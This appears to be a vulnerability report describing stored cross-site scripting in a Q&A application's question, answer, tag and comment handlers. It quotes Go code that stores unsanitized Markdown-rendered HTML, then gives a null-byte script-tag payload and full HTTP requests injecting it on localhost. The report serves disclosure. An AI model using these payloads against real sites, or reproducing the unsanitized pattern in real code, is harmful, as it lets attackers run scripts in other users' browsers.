The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Posting the Question:
// Check renders the question body and each tag's original text from
// Markdown to HTML and stores the results on the request (req.HTML and
// tag.ParsedText). It performs no validation: both return values are
// always nil.
//
// NOTE(review): the converter output is stored without any sanitization
// step visible here, so user-supplied markup reaches req.HTML exactly as
// converter.Markdown2HTML emits it — confirm the converter strips active
// content before this value is served to other users.
func (req *QuestionAdd) Check() (errFields []*validator.FormErrorField, err error) {
	req.HTML = converter.Markdown2HTML(req.Content)
	for _, item := range req.Tags {
		// Tags without free-form text have nothing to render.
		if len(item.OriginalText) == 0 {
			continue
		}
		item.ParsedText = converter.Markdown2HTML(item.OriginalText)
	}
	return
}
Updating the Question:
// Check renders req.Content from Markdown to HTML into req.HTML. No
// validation is done; the returned error fields and error are always nil.
//
// NOTE(review): no sanitization of the rendered HTML is visible here —
// verify that converter.Markdown2HTML neutralizes script/style markup
// before req.HTML is stored and served.
func (req *QuestionUpdate) Check() (errFields []*validator.FormErrorField, err error) {
	rendered := converter.Markdown2HTML(req.Content)
	req.HTML = rendered
	return
}
Posting the Answer:
// Check converts the answer body (req.Content) from Markdown to HTML and
// stores it in req.HTML. It never reports a validation failure.
//
// NOTE(review): the converter result is stored unsanitized as far as this
// method shows — confirm active markup is neutralized upstream or at render.
func (req *AnswerAddReq) Check() (errFields []*validator.FormErrorField, err error) {
	rendered := converter.Markdown2HTML(req.Content)
	req.HTML = rendered
	return
}
Updating the Answer:
// Check converts the updated answer body (req.Content) from Markdown to
// HTML and stores it in req.HTML. Both return values are always nil.
//
// NOTE(review): same pattern as AnswerAddReq.Check — no visible
// sanitization of the generated HTML; confirm the converter handles it.
func (req *AnswerUpdateReq) Check() (errFields []*validator.FormErrorField, err error) {
	rendered := converter.Markdown2HTML(req.Content)
	req.HTML = rendered
	return
}
Updating the Tag:
// Check fills in a default edit summary when none was supplied and renders
// the tag's OriginalText from Markdown to HTML into ParsedText. It performs
// no validation; both return values are always nil.
//
// NOTE(review): ParsedText is stored straight from the converter with no
// sanitization visible here — verify that user-controlled markup cannot
// reach other users' pages through this field.
func (r *UpdateTagReq) Check() (errFields []*validator.FormErrorField, err error) {
	// An empty summary falls back to the fixed i18n key.
	if r.EditSummary == "" {
		r.EditSummary = "tag.edit.summary"
	}
	r.ParsedText = converter.Markdown2HTML(r.OriginalText)
	return
}
Adding a comment:
// Check renders the comment's OriginalText from Markdown to HTML and stores
// it in ParsedText. No validation is performed; it always returns nil, nil.
//
// NOTE(review): no sanitization of the rendered HTML is visible in this
// method — confirm converter.Markdown2HTML neutralizes active content.
func (req *AddCommentReq) Check() (errFields []*validator.FormErrorField, err error) {
	rendered := converter.Markdown2HTML(req.OriginalText)
	req.ParsedText = rendered
	return
}
Updating a Comment:
// Check renders the edited comment's OriginalText from Markdown to HTML and
// stores it in ParsedText. Both return values are always nil.
//
// NOTE(review): same as AddCommentReq.Check — the converter output is stored
// without a visible sanitization step; confirm this is handled elsewhere.
func (req *UpdateCommentReq) Check() (errFields []*validator.FormErrorField, err error) {
	rendered := converter.Markdown2HTML(req.OriginalText)
	req.ParsedText = rendered
	return
}
Payload:
<script>alert(1)<\\x00/script>
<style></style><img src />
Request @ Question:
POST /answer/api/v1/question HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
Content-Type: application/json
Content-Length: 213
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/questions/ask
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"title":"question","content":"<script>alert(1)<\\\\x00/script>\n<style></style><img src />","tags":[{"original_text":"","parsed_text":"","slug_name":"nano","recommend":false,"reserved":false}]}
Request @ Answer:
POST /answer/api/v1/post/render HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
Content-Type: application/json
Content-Length: 95
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/questions/10010000000000007
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"content":"<script>alert(1)<\\\\x00/script>\n<style></style><img src />\n"}
Request @ Tag:
PUT /answer/api/v1/tag HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
Content-Type: application/json
Content-Length: 272
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/tags/10030000000000002/edit
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"display_name":"a","slug_name":"a","original_text":"<script>alert(1)<\\\\x00/script>\n<style></style><img src />","parsed_text":"<style></style><img src /><blockquote>\n</blockquote>\n","tag_id":"10030000000000002","edit_summary":""}
Request @ Comment:
POST /answer/api/v1/comment HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 1d798f13-bda1-11ed-9586-0242ac110002
Content-Type: application/json
Content-Length: 158
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/questions/10010000000000012/nadahh
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"object_id":"10020000000000015","original_text":"<script>alert(1)<\\\\x00/script>\n<style></style><img src />","mention_username_list":[]}